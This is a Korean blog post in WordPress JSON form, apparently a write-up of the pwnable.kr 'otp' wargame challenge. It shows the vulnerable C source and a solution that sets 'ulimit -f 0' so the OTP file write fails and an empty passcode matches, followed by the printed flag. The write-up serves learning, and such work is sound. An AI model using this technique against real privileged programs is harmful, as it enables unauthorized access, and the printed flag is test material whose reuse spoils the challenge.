{"id":3271,"date":"2025-04-10T18:59:07","date_gmt":"2025-04-10T09:59:07","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3271"},"modified":"2025-04-10T18:59:08","modified_gmt":"2025-04-10T09:59:08","slug":"otp","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3271","title":{"rendered":"otp"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">I made a skeleton interface for one time password authentication system.\nI guess there are no security mistakes. could you take a look at it?\n\nHint : no need to brute-force\n\nssh otp@pwnable.kr -p2222 (pw:guest)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Source Code<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>otp.c<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;stdlib.h>\n#include &lt;string.h>\n#include &lt;fcntl.h>\n\nint main(int argc, char* argv[]){\n\tchar fname[128];\n\tunsigned long long otp[2];\n\n\tif(argc!=2){\n\t\tprintf(\"usage : .\/otp [passcode]\\n\");\n\t\treturn 0;\n\t}\n\n\tint fd = open(\"\/dev\/urandom\", O_RDONLY);\n\tif(fd==-1) exit(-1);\n\n\tif(read(fd, otp, 16)!=16) exit(-1);\n\tclose(fd);\n\n\tsprintf(fname, \"\/tmp\/%llu\", otp[0]);\n\tFILE* fp = fopen(fname, \"w\");\n\tif(fp==NULL){ exit(-1); }\n\tfwrite(&amp;otp[1], 8, 1, fp);\n\tfclose(fp);\n\n\tprintf(\"OTP generated.\\n\");\n\n\tunsigned long long passcode=0;\n\tFILE* fp2 = fopen(fname, \"r\");\n\tif(fp2==NULL){ exit(-1); }\n\tfread(&amp;passcode, 8, 1, fp2);\n\tfclose(fp2);\n\t\n\tif(strtoul(argv[1], 0, 16) == passcode){\n\t\tprintf(\"Congratz!\\n\");\n\t\tsetregid(getegid(), getegid());\n\t\tsystem(\"\/bin\/cat flag\");\n\t}\n\telse{\n\t\tprintf(\"OTP mismatch\\n\");\n\t}\n\n\tunlink(fname);\n\treturn 0;\n}\n<\/pre>\n\n\n\n<p><code>\/dev\/urandom<\/code>\uc5d0\uc11c 16\ubc14\uc774\ud2b8(8\ubc14\uc774\ud2b8\uc529 2\uac1c)\ub97c \uc77d\uc5b4 <code>otp[0]<\/code>\uacfc <code>otp[1]<\/code>\uc5d0 \uc800\uc7a5\ud55c\ub2e4.<\/p>\n\n\n\n<p>\uc784\uc2dc \ud30c\uc77c \uc774\ub984\uc744 <code>\/tmp\/[otp[0]]<\/code>, \ud30c\uc77c \ub0b4\uc6a9\uc744 <code>otp[1]<\/code> (8\ubc14\uc774\ud2b8)\ub85c \uc9c0\uc815\ud55c\ub2e4.<\/p>\n\n\n\n<p>\ubc29\uae08 \ub9cc\ub4e0 \uc784\uc2dc \ud30c\uc77c\uc744 \ub2e4\uc2dc \uc5f4\uc5b4 <code>otp[1]<\/code> \uac12\uc744 \uc77d\uc5b4\uc624\uace0 16\uc9c4\uc218 \uc22b\uc790\ub85c \ubcc0\ud658\ud558\uc5ec \uc0ac\uc6a9\uc790 \uc785\ub825\uc778 <code>argv[1]<\/code> \uc640 \ube44\uad50\ud588\uc744\ub54c \uc77c\uce58\ud558\uba74 flag\ub97c \ud68d\ub4dd\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Solution<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">ulimit<\/h2>\n\n\n\n<p>\uac04\ub7b5\ud788 \uc124\uba85\ud558\uba74, <code>ulimit<\/code> \uba85\ub839\uc5b4\ub294 \uc0dd\uc131\uc2dc\ud0ac \uc218 \uc788\ub294 \ud30c\uc77c \uc0ac\uc774\uc988 \ud06c\uae30\ub97c \uc784\uc758\ub85c \uc9c0\uc815\uc2dc\ucf1c\uc904 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ULIMIT(3)                   Linux Programmer's Manual                   ULIMIT(3)\n\nNAME\n       ulimit - get and set user limits\n\nSYNOPSIS\n       #include &lt;ulimit.h>\n\n       long ulimit(int cmd, long newlimit);\n\nDESCRIPTION\n       Warning:  this  routine  is obsolete.  Use getrlimit(2), setrlimit(2), and\n       sysconf(3) instead.  For the shell command ulimit(), see bash(1).\n\n       The ulimit() call will get or set some limit for the calling process.  The\n       cmd argument can have one of the following values.\n\n       UL_GETFSIZE\n              Return the limit on the size of a file, in units of 512 bytes.\n\n       UL_SETFSIZE\n              Set the limit on the size of a file.\n\n       3      (Not  implemented  for Linux.)  Return the maximum possible address\n              of the data segment.\n\n       4      (Implemented but no symbolic constant provided.)  Return the  maxi\u2010\n              mum number of files that the calling process can open.\n\nRETURN VALUE\n       On  success,  ulimit()  returns  a nonnegative value.  On error, -1 is re\u2010\n       turned, and errno is set appropriately.\n\nERRORS\n       EPERM  An unprivileged process tried to increase a limit.\n\nATTRIBUTES\n       For an explanation of the terms used in this section, see attributes(7).\n\n       \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n       \u2502Interface \u2502 Attribute     \u2502 Value   \u2502\n       \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n       \u2502ulimit()  \u2502 Thread safety \u2502 MT-Safe \u2502\n       \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\nCONFORMING TO\n       SVr4, POSIX.1-2001.  POSIX.1-2008 marks ulimit() as obsolete.\n\nSEE ALSO\n       bash(1), getrlimit(2), setrlimit(2), sysconf(3)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<p>\uc0dd\uc131\uc2dc\ud0ac \uc218 \uc788\ub294 \ud30c\uc77c \uc0ac\uc774\uc988\ub97c 0\uc73c\ub85c \uc9c0\uc815\ud588\uae30\uc5d0 <code>fp2<\/code>\ub85c\ubd80\ud130 <code>fread<\/code>\ud588\uc744\uc2dc <code>passcode<\/code>\uc5d0 \uc544\ubb34\uac83\ub3c4 \ub4e4\uc5b4\uac00\uc788\uc9c0 \uc54a\ub2e4.<\/p>\n\n\n\n<p>\ub530\ub77c\uc11c otp \uc2e4\ud589\uc778\uc790\ub97c \ube44\uc5b4\ub450\uac8c \ub9cc\ub4e4\uba74 \ud50c\ub798\uadf8\ub97c \ud68d\ub4dd\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">otp@ubuntu:~$ ulimit -f 0\notp@ubuntu:~$ python2\nPython 2.7.18 (default, Dec  9 2024, 18:47:23) \n[GCC 11.4.0] on linux2\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import subprocess\n>>> subprocess.call(['\/home\/otp\/otp', ''])\nOTP generated.\nCongratz!\nf1le_0peration_r3turn_value_matters<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description Source Code \/dev\/urandom\uc5d0\uc11c 16\ubc14\uc774\ud2b8(8\ubc14\uc774\ud2b8\uc529 2\uac1c)\ub97c \uc77d\uc5b4 otp[0]\uacfc otp[1]\uc5d0 \uc800\uc7a5\ud55c\ub2e4. \uc784\uc2dc \ud30c\uc77c \uc774\ub984\uc744 \/tmp\/[otp[0]], \ud30c\uc77c \ub0b4\uc6a9\uc744 otp[1] (8\ubc14\uc774\ud2b8)\ub85c \uc9c0\uc815\ud55c\ub2e4. \ubc29\uae08 \ub9cc\ub4e0 \uc784\uc2dc \ud30c\uc77c\uc744 \ub2e4\uc2dc \uc5f4\uc5b4 otp[1] \uac12\uc744 \uc77d\uc5b4\uc624\uace0 16\uc9c4\uc218 \uc22b\uc790\ub85c \ubcc0\ud658\ud558\uc5ec \uc0ac\uc6a9\uc790 \uc785\ub825\uc778 argv[1] \uc640 \ube44\uad50\ud588\uc744\ub54c \uc77c\uce58\ud558\uba74 flag\ub97c \ud68d\ub4dd\ud560 \uc218 \uc788\ub2e4. Solution ulimit \uac04\ub7b5\ud788 \uc124\uba85\ud558\uba74, ulimit \uba85\ub839\uc5b4\ub294 \uc0dd\uc131\uc2dc\ud0ac \uc218 \uc788\ub294 \ud30c\uc77c \uc0ac\uc774\uc988 \ud06c\uae30\ub97c \uc784\uc758\ub85c \uc9c0\uc815\uc2dc\ucf1c\uc904&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3271\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">otp<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-3271","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3271","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3271"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3271\/revisions"}],"predecessor-version":[{"id":3272,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3271\/revisions\/3272"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3271"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3271"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3271"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}